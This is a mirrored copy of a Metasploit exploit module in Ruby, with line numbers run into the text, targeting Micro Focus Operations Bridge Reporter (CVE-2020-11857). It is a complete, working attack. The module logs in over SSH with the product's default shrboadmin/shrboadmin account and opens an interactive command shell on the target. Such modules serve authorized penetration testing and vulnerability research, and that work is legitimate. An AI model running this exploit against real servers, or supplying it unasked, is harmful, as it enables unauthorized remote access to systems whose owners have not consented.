Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'net/ssh'6require 'net/ssh/command_stream'78class MetasploitModule < Msf::Exploit::Remote9Rank = ExcellentRanking1011include Msf::Exploit::Remote::SSH1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Micro Focus Operations Bridge Reporter shrboadmin default password',18'Description' => %q{19This module abuses a known default password on Micro Focus Operations Bridge Reporter.20The 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin',21and allows an attacker to login to the server via SSH.22This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier23versions are most likely affected too.24Note that this is only exploitable in Linux installations.25},26'License' => MSF_LICENSE,27'Author' => [28'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module29],30'References' => [31[ 'CVE', '2020-11857' ],32[ 'ZDI', '20-1215' ],33[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ],34[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ],35],36'DefaultOptions' => {37'EXITFUNC' => 'thread'38},39'Payload' => {40'Compat' => {41'PayloadType' => 'cmd_interact',42'ConnectionType' => 'find'43}44},45'Platform' => 'unix',46'Arch' => ARCH_CMD,47'Targets' => [48[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],49],50'Privileged' => false,51'DefaultTarget' => 0,52'DisclosureDate' => '2020-09-21',53'Notes' => {54'Stability' => [CRASH_SAFE],55'Reliability' => [REPEATABLE_SESSION],56'SideEffects' => []57}58)59)6061register_options(62[63Opt::RPORT(22),64OptString.new('USERNAME', [true, 'Username to login with', 'shrboadmin']),65OptString.new('PASSWORD', [true, 'Password to login with', 'shrboadmin']),66], self.class67)6869register_advanced_options(70[71OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),72OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])73]74)75end7677def rhost78datastore['RHOST']79end8081def rport82datastore['RPORT']83end8485def do_login(user, pass)86opts = ssh_client_defaults.merge({87auth_methods: ['password', 'keyboard-interactive'],88port: rport,89password: pass90})9192opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']9394begin95ssh = nil96::Timeout.timeout(datastore['SSH_TIMEOUT']) do97ssh = Net::SSH.start(rhost, user, opts)98end99rescue Rex::ConnectionError100return101rescue Net::SSH::Disconnect, ::EOFError102print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"103return104rescue ::Timeout::Error105print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"106return107rescue Net::SSH::AuthenticationFailed108print_error "#{rhost}:#{rport} SSH - Failed authentication"109rescue Net::SSH::Exception => e110print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"111return112end113114if ssh115conn = Net::SSH::CommandStream.new(ssh)116ssh = nil117return conn118end119120return nil121end122123def exploit124user = datastore['USERNAME']125pass = datastore['PASSWORD']126127print_status("#{rhost}:#{rport} - Attempt to login to the server...")128conn = do_login(user, pass)129if conn130print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")131handler(conn.lsock)132end133end134end135136137